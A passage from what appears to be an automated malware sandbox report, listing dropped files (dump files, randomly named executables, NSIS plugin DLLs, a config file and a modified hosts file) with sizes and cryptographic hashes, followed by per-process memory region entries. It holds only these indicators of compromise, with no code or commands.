
                                          275KB

                                          MD5

                                          4633b298d57014627831ccac89a2c50b

                                          SHA1

                                          e5f449766722c5c25fa02b065d22a854b6a32a5b

                                          SHA256

                                          b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9

                                          SHA512

                                          29590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3

                                        • C:\Windows\TEMP\eqbflpvll\1316.dmp

                                          Filesize

                                          25.8MB

                                          MD5

                                          2348ac77306c214bfe79e91f3807b856

                                          SHA1

                                          6331e2362f41856dd138efd7f66009130e2fcffd

                                          SHA256

                                          d31254679fe3235afba9080db8cd942fdfa1883599d5013ac533b28dbb07cafa

                                          SHA512

                                          73c66420f7144bd58a66989c161201bb03917ec238055fd23926e6ab08f45c50121c95103b81de13d7571d83254a09c60ad8bcbf6d9c8232c68157bb7214dcf0

                                        • C:\Windows\TEMP\eqbflpvll\1492.dmp

                                          Filesize

                                          2.8MB

                                          MD5

                                          afad219ce05f59c754f7216f97a8a285

                                          SHA1

                                          ed09bbd2bf030f5e81010040eadd60735e5a23bc

                                          SHA256

                                          5e26eb078781cc3bb7a6f0a61bb7428f24708b8fbda4202bc00dfe092c9d4315

                                          SHA512

                                          26a9c74110ef4a5999bc323a6bce771bfd4d635dc919b151e5ba14a21bf02861d23d81f26b5af3d52b80d2b7afa033bdebf6433c5672ece2d07709a8e5a839df

                                        • C:\Windows\TEMP\eqbflpvll\1680.dmp

                                          Filesize

                                          4.1MB

                                          MD5

                                          ab5b7b901cac7eb1d65ebe3260047708

                                          SHA1

                                          37a59cbb78030f96ce833d7bd958f2f056d56e22

                                          SHA256

                                          868e1b9e54b7e2fc7a2b024722827d29217c704d3d4e79adf21e9356f9768c17

                                          SHA512

                                          8035794e442e2b17237d7b377627eb4c69c493f49193f8326743f155677a3bdff7fc393f790a1939c2f747b38ade756153206f6e96059e79af870f37f79bf5e9

                                        • C:\Windows\TEMP\eqbflpvll\2512.dmp

                                          Filesize

                                          3.7MB

                                          MD5

                                          499049ac7fa2c6ca4c3ca46ed26c1fb7

                                          SHA1

                                          99958bcc393d104202e7d9ca881c641bb1f7a4ab

                                          SHA256

                                          1641681ae9d4df3b0de3045f1879d2ed58d01de19e613e8796c30f636b6dfca7

                                          SHA512

                                          0d2f815532304ded46e1edd69505914f7c8de1d13871c649cb8c187f85a1b7774f3c9963f45c23190a31c8d08d3d5a2aeb43677abd89b4453258f2316cf1ae82

                                        • C:\Windows\TEMP\eqbflpvll\2696.dmp

                                          Filesize

                                          7.5MB

                                          MD5

                                          4740149258888d64fd65bb02936ecb37

                                          SHA1

                                          a339dcb7c94d2c9624a849664ec0d5672ba0346c

                                          SHA256

                                          e871867bed23fe84971fb5c9773e4697b810b85c9f92e5451528025f0a32ef15

                                          SHA512

                                          4e3a2a19875bfb845929652f7accdc4610414a932dea2f4ef020adaf21ceb3716ef5f1065ad03076f900aedcba07fba2efd25a37affa55a35c469fa844db006d

                                        • C:\Windows\TEMP\eqbflpvll\2728.dmp

                                          Filesize

                                          2.9MB

                                          MD5

                                          7f37221dbf45149a2921dcce040e69c4

                                          SHA1

                                          258dbab9b11421f9b9300c24b42294ca40a4266b

                                          SHA256

                                          e447002f922a08508c1519e1160c1462e04a31363769c6f53af87718d40b7b40

                                          SHA512

                                          43b325890d1c402fc8a85e2614f1a63ccf13b32273365b717e4c6888790c5cf5bcfdf9cf369e1ae778c6a990c4540091144d7b3d464af20ca9cdf3f426d2340a

                                        • C:\Windows\TEMP\eqbflpvll\3092.dmp

                                          Filesize

                                          810KB

                                          MD5

                                          44721b9592d43c5f5b7eee593b88e54b

                                          SHA1

                                          d53eaed390deaffc4f8b4f5b37cf7148f6e53790

                                          SHA256

                                          c903b7c0c00ccc3389e65902aa1c46b4802ff3eafd0273f62f5ec0bf17c9cf8d

                                          SHA512

                                          ea3d611494088990b262289c1ce28867271bd88a5bfb553373f337929422431423233c1be8a11dafa5a081831affd9ead942e362bcf32c3e1ba12b9ba7028dc6

                                        • C:\Windows\TEMP\eqbflpvll\3764.dmp

                                          Filesize

                                          2.4MB

                                          MD5

                                          50b455d8b7e1d5a2ebd5e1e50e1c6c84

                                          SHA1

                                          8bdfcb44aec06cc66f08fafdb310311cfe5e98da

                                          SHA256

                                          fa063ec3030c5a1e8e44f81de5a0543fd0a6abd477f0a12602f45cd61b2a8b77

                                          SHA512

                                          962857873584141bd20a9d4adca68fac6dc841bdc5c4e0a6ba0596d72a0880822608539d52feb5a1fa1856ba8e1888d78b8280d5bf8e367718be717f316a2ea7

                                        • C:\Windows\TEMP\eqbflpvll\3852.dmp

                                          Filesize

                                          20.5MB

                                          MD5

                                          3e0c9a03c86f4b3dd6d7902215577973

                                          SHA1

                                          0dee142fa10614046d35056f6a15cca4c43ebfcd

                                          SHA256

                                          dfad440d234fc779eee8bedf8572265ab2b0ad6fd94eee5ab1a0805bdecfb9bf

                                          SHA512

                                          628159ca5848ea36edbe8d72ab1218f380348b7ceeebdfbd4d20ed2a170d6ce85a9ca47c142323f6e256c9fb708f2c22f6f446ab63c3e58a90fa8fd08751b705

                                        • C:\Windows\TEMP\eqbflpvll\3864.dmp

                                          Filesize

                                          8.6MB

                                          MD5

                                          6f3f402bed7178044e5a70f6cb781cfe

                                          SHA1

                                          68487369ce173e497d385004f2e86a357168e8d2

                                          SHA256

                                          078bc7bd6e89b05796a3a96ed226345d2eef7fd8c121c8edc9f71d113ebc9429

                                          SHA512

                                          91c4f58a648b6504eec9dd4fce8d65ebdd31cc43eca18712fbbfc09fddd47ac6178d9063be04100a151de7863cd513fee6054967505f7c3c25a4b36e36be5cda

                                        • C:\Windows\TEMP\eqbflpvll\3920.dmp

                                          Filesize

                                          4.3MB

                                          MD5

                                          e2946813235184a518d892cb8031faeb

                                          SHA1

                                          0c2bd4ab1cc81d7c4415feff4bd8577c3f588dd3

                                          SHA256

                                          585a9aad1dabcdaf005f367ea9d856fb4ebf2069769460bb20444d010115bf78

                                          SHA512

                                          4964cec4530c5b3bc5d1fff5d440630fea820a9f46373f928014e86f183459db426212ab27e0741d2fb4d57667d3e9d43a846a82a87854e714ae6baddca91fad

                                        • C:\Windows\TEMP\eqbflpvll\3996.dmp

                                          Filesize

                                          1.2MB

                                          MD5

                                          75e1713d2dd6072578cd4c1e5bfbfc2d

                                          SHA1

                                          7976c091f89e6c229269f8801c136b79ba6253e6

                                          SHA256

                                          0e74b0204cd486e86becbd3b6fb2113aa5d9f37b71d799ee28a3e4558d1a3011

                                          SHA512

                                          b51f9b3981134acb55c67b9cfc357f4bf374d1e547d3381d3bc1165ab03053c50bac6cc03ec6307cfb62ddc2cc1baacd7a76c43810e2d304ffe0392346427f36

                                        • C:\Windows\TEMP\eqbflpvll\4012.dmp

                                          Filesize

                                          43.7MB

                                          MD5

                                          0532cdda57e45473e22e787f3e074ae8

                                          SHA1

                                          883d3a7771b4dfbc01904bf17f6d1f9e16251429

                                          SHA256

                                          c382201525a30d0546005355b239d7baefa47d7cbfa470e825f7d5ec36a10933

                                          SHA512

                                          badc74f80f7b08030edb95962b9a8fc64a9cb382b8218b71e011b72e08974d70818e016ad1d7ca0d39987eef6780a47960136f98348288c564231b23615ffca5

                                        • C:\Windows\TEMP\eqbflpvll\64.dmp

                                          Filesize

                                          33.4MB

                                          MD5

                                          74e7fd4c925f74e9d269be647f977747

                                          SHA1

                                          8065a877ba6918d69851d36e9c11a5667c451aa1

                                          SHA256

                                          d6f965ff55dfc66d94c4b4e0f8455952c2a65d0802adcbc3d8699075024b5583

                                          SHA512

                                          181a2d4e4aee8205ec05585b1c28f7889bf395929a1cd2ac6f2c12048a6a663e6f305b14b57fdac81a3e6931a8d0fbd989c211f76734d5e2bcfcc50f9aa89392

                                        • C:\Windows\TEMP\eqbflpvll\788.dmp

                                          Filesize

                                          1019KB

                                          MD5

                                          30d11cc040816a1a45f19038027f30ff

                                          SHA1

                                          3eca826190426756fbec2abff7f7543fc050ed3b

                                          SHA256

                                          bab6ff2b9186b37cd95a41dbccef0ea11d6e558f756d03d1a499030ec7e26a34

                                          SHA512

                                          1a4a19ff279888b27c57905b747ae7b2c357d274e864d6a42fd68c9281140e800d344fed3509be5725653794b219f5adae2aeadf120ec8b11bb89eb06aa83c7f

                                        • C:\Windows\TEMP\uczqnfqby\config.json

                                          Filesize

                                          693B

                                          MD5

                                          f2d396833af4aea7b9afde89593ca56e

                                          SHA1

                                          08d8f699040d3ca94e9d46fc400e3feb4a18b96b

                                          SHA256

                                          d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34

                                          SHA512

                                          2f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01

                                        • C:\Windows\Temp\eqbflpvll\bbdqsyfub.exe

                                          Filesize

                                          126KB

                                          MD5

                                          e8d45731654929413d79b3818d6a5011

                                          SHA1

                                          23579d9ca707d9e00eb62fa501e0a8016db63c7e

                                          SHA256

                                          a26ae467f7b6f4bb23d117ca1e1795203821ca31ce6a765da9713698215ae9af

                                          SHA512

                                          df6bcdc59be84290f9ecb9fa0703a3053498f49f63d695584ffe595a88c014f4acf4864e1be0adf74531f62ce695be66b28cfd1b98e527ab639483802b5a37a6

                                        • C:\Windows\Temp\nsk125C.tmp\System.dll

                                          Filesize

                                          11KB

                                          MD5

                                          2ae993a2ffec0c137eb51c8832691bcb

                                          SHA1

                                          98e0b37b7c14890f8a599f35678af5e9435906e1

                                          SHA256

                                          681382f3134de5c6272a49dd13651c8c201b89c247b471191496e7335702fa59

                                          SHA512

                                          2501371eb09c01746119305ba080f3b8c41e64535ff09cee4f51322530366d0bd5322ea5290a466356598027e6cda8ab360caef62dcaf560d630742e2dd9bcd9

                                        • C:\Windows\Temp\nsk125C.tmp\nsExec.dll

                                          Filesize

                                          6KB

                                          MD5

                                          b648c78981c02c434d6a04d4422a6198

                                          SHA1

                                          74d99eed1eae76c7f43454c01cdb7030e5772fc2

                                          SHA256

                                          3e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9

                                          SHA512

                                          219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2

                                        • C:\Windows\Temp\uczqnfqby\ftfrpi.exe

                                          Filesize

                                          343KB

                                          MD5

                                          2b4ac7b362261cb3f6f9583751708064

                                          SHA1

                                          b93693b19ebc99da8a007fed1a45c01c5071fb7f

                                          SHA256

                                          a5a0268c15e00692a08af62e99347f6e37ee189e9db3925ebf60835e67aa7d23

                                          SHA512

                                          c154d2c6e809b0b48cc2529ea5745dc4fc3ddd82f8f9d0f7f827ff5590868c560d7bec42636cb61e27cc1c9b4ac2499d3657262826bbe0baa50f66b40e28b616

                                        • C:\Windows\Temp\xohudmc.exe

                                          Filesize

                                          72KB

                                          MD5

                                          cbefa7108d0cf4186cdf3a82d6db80cd

                                          SHA1

                                          73aeaf73ddd694f99ccbcff13bd788bb77f223db

                                          SHA256

                                          7c65ffc83dbbbd1ec932550ea765031af6e48c6b5b622fc2076c41b8abb0fcb9

                                          SHA512

                                          b89b6d9c77c839d0d411d9abf2127b632547476c2272219d46ba12832d5a1dab98f4010738969e905e4d791b41596473397cf73db5da43ecab23486e33b0e1d1

                                        • C:\Windows\eqbflpvll\Corporate\vfshost.exe

                                          Filesize

                                          381KB

                                          MD5

                                          fd5efccde59e94eec8bb2735aa577b2b

                                          SHA1

                                          51aaa248dc819d37f8b8e3213c5bdafc321a8412

                                          SHA256

                                          441430308fa25ec04fd913666f5e0748fdb10743984656d55acc26542e5fff45

                                          SHA512

                                          74a7eebdee9d25a306be83cb3568622ea9c1b557a8fbb86945331209bdc884e48113c3d01aac5347d88b8d2f786f8929aa6bb55d80516f3b4f9cc0f18362e8e3

                                        • C:\Windows\eqbflpvll\cqzqykzwz\bqpfqegdw.exe

                                          Filesize

                                          332KB

                                          MD5

                                          ea774c81fe7b5d9708caa278cf3f3c68

                                          SHA1

                                          fc09f3b838289271a0e744412f5f6f3d9cf26cee

                                          SHA256

                                          4883500a1bdb7ca43749635749f6a0ec0750909743bde3a2bc1bfc09d088ca38

                                          SHA512

                                          7cfde964c1c62759e3ba53c47495839e307ba0419d740fcacbeda1956dcee3b51b3cf39e6891120c72d0aae48e3ea1019c385eb5006061ced89f33b15faa8acb

                                        • C:\Windows\eqbflpvll\cqzqykzwz\wpcap.exe

                                          Filesize

                                          424KB

                                          MD5

                                          e9c001647c67e12666f27f9984778ad6

                                          SHA1

                                          51961af0a52a2cc3ff2c4149f8d7011490051977

                                          SHA256

                                          7ec51f4041f887ba1d4241054f3be8b5068291902bada033081eff7144ec6a6d

                                          SHA512

                                          56f0cff114def2aeda0c2c8bd9b3abcacef906187a253ea4d943b3f1e1ca52c452d82851348883288467a8c9a09d014910c062325964bcfe9618d7b58056e1fe

                                        • C:\Windows\ibcutqwu\gzlqlcb.exe

                                          Filesize

                                          8.5MB

                                          MD5

                                          029ade0cb06dead94ce4ef8a10413318

                                          SHA1

                                          9f378fe37403553fbe342e011378e318604d9c8c

                                          SHA256

                                          585dab8b991e2768ff9dc035f70e8a468bfc524583f1294f753eefb26398762e

                                          SHA512

                                          cc848a74ea9dba44902ccd5bdb79e5120dc791e91abdd0e0c17ba5153210dbffa7cf1b6043466042c69dd4ca1e2e78e5eaee09c7d2afc9c590cd5ccd950cb8b7

                                        • C:\Windows\system32\drivers\etc\hosts

                                          Filesize

                                          1KB

                                          MD5

                                          c838e174298c403c2bbdf3cb4bdbb597

                                          SHA1

                                          70eeb7dfad9488f14351415800e67454e2b4b95b

                                          SHA256

                                          1891edcf077aa8ed62393138f16e445ef4290a866bccdbb7e2d7529034a66e53

                                          SHA512

                                          c53a52b74d19274c20dece44f46c5d9f37cd0ec28cf39cac8b26ba59712f789c14d1b10b7f5b0efdf7ce3211dda0107792cc42503faa82cb13ffae979d49d376

                                        • memory/368-237-0x00007FF69BF60000-0x00007FF69BFBB000-memory.dmp

                                          Filesize

                                          364KB

                                        • memory/1212-137-0x00007FF7C5E80000-0x00007FF7C5F6E000-memory.dmp

                                          Filesize

                                          952KB

                                        • memory/1212-135-0x00007FF7C5E80000-0x00007FF7C5F6E000-memory.dmp

                                          Filesize

                                          952KB

                                        • memory/1272-8-0x0000000000400000-0x0000000000AA4000-memory.dmp

                                          Filesize

                                          6.6MB

                                        • memory/1604-184-0x00007FF69BF60000-0x00007FF69BFBB000-memory.dmp

                                          Filesize

                                          364KB

                                        • memory/1652-192-0x00007FF69BF60000-0x00007FF69BFBB000-memory.dmp

                                          Filesize

                                          364KB

                                        • memory/1768-227-0x00007FF69BF60000-0x00007FF69BFBB000-memory.dmp

                                          Filesize

                                          364KB

                                        • memory/1836-214-0x00007FF69BF60000-0x00007FF69BFBB000-memory.dmp

                                          Filesize

                                          364KB

                                        • memory/2020-4-0x0000000000400000-0x0000000000AA4000-memory.dmp

                                          Filesize

                                          6.6MB

                                        • memory/2020-0-0x0000000000400000-0x0000000000AA4000-memory.dmp

                                          Filesize

                                          6.6MB

                                        • memory/2180-188-0x00007FF69BF60000-0x00007FF69BFBB000-memory.dmp

                                          Filesize

                                          364KB

                                        • memory/2480-234-0x00007FF69BF60000-0x00007FF69BFBB000-memory.dmp

                                          Filesize

                                          364KB

                                        • memory/2488-148-0x0000000010000000-0x0000000010008000-memory.dmp

                                          Filesize

                                          32KB

                                        • memory/2488-161-0x0000000000400000-0x0000000000412000-memory.dmp

                                          Filesize

                                          72KB

                                        • memory/2656-196-0x00007FF69BF60000-0x00007FF69BFBB000-memory.dmp

                                          Filesize

                                          364KB

                                        • memory/2764-239-0x00007FF69BF60000-0x00007FF69BFBB000-memory.dmp

                                          Filesize

                                          364KB

                                        • memory/2952-164-0x00007FF6943D0000-0x00007FF6944F0000-memory.dmp

                                          Filesize

                                          1.1MB

                                        • memory/2952-177-0x00007FF6943D0000-0x00007FF6944F0000-memory.dmp

                                          Filesize

                                          1.1MB

                                        • memory/2952-167-0x0000026C77790000-0x0000026C777A0000-memory.dmp

                                          Filesize

                                          64KB

                                        • memory/2952-249-0x00007FF6943D0000-0x00007FF6944F0000-memory.dmp

                                          Filesize

                                          1.1MB

                                        • memory/2952-235-0x00007FF6943D0000-0x00007FF6944F0000-memory.dmp

                                          Filesize

                                          1.1MB

                                        • memory/2952-211-0x00007FF6943D0000-0x00007FF6944F0000-memory.dmp

                                          Filesize

                                          1.1MB

                                        • memory/2952-252-0x00007FF6943D0000-0x00007FF6944F0000-memory.dmp

                                          Filesize

                                          1.1MB

                                        • memory/2952-199-0x00007FF6943D0000-0x00007FF6944F0000-memory.dmp

                                          Filesize

                                          1.1MB

                                        • memory/2952-253-0x00007FF6943D0000-0x00007FF6944F0000-memory.dmp

                                          Filesize

                                          1.1MB

                                        • memory/2952-251-0x00007FF6943D0000-0x00007FF6944F0000-memory.dmp

                                          Filesize

                                          1.1MB

                                        • memory/2952-220-0x00007FF6943D0000-0x00007FF6944F0000-memory.dmp

                                          Filesize

                                          1.1MB

                                        • memory/2952-181-0x00007FF6943D0000-0x00007FF6944F0000-memory.dmp

                                          Filesize

                                          1.1MB

                                        • memory/3192-159-0x00007FF69BF60000-0x00007FF69BFBB000-memory.dmp

                                          Filesize

                                          364KB

                                        • memory/3192-145-0x00007FF69BF60000-0x00007FF69BFBB000-memory.dmp

                                          Filesize

                                          364KB

                                        • memory/3216-179-0x00007FF69BF60000-0x00007FF69BFBB000-memory.dmp

                                          Filesize

                                          364KB

                                        • memory/3220-232-0x00007FF69BF60000-0x00007FF69BFBB000-memory.dmp

                                          Filesize

                                          364KB

                                        • memory/3392-223-0x00007FF69BF60000-0x00007FF69BFBB000-memory.dmp

                                          Filesize

                                          364KB

                                        • memory/3524-170-0x00007FF69BF60000-0x00007FF69BFBB000-memory.dmp

                                          Filesize

                                          364KB

                                        • memory/3980-174-0x00007FF69BF60000-0x00007FF69BFBB000-memory.dmp

                                          Filesize

                                          364KB

                                        • memory/4512-205-0x00007FF69BF60000-0x00007FF69BFBB000-memory.dmp

                                          Filesize

                                          364KB

                                        • memory/4520-78-0x0000000000BC0000-0x0000000000C0C000-memory.dmp

                                          Filesize

                                          304KB

                                        • memory/4592-218-0x00007FF69BF60000-0x00007FF69BFBB000-memory.dmp

                                          Filesize

                                          364KB

                                        • memory/4600-209-0x00007FF69BF60000-0x00007FF69BFBB000-memory.dmp

                                          Filesize

                                          364KB

                                        • memory/4776-250-0x00000000003B0000-0x00000000003C2000-memory.dmp

                                          Filesize

                                          72KB

                                        • memory/4880-201-0x00007FF69BF60000-0x00007FF69BFBB000-memory.dmp

                                          Filesize

                                          364KB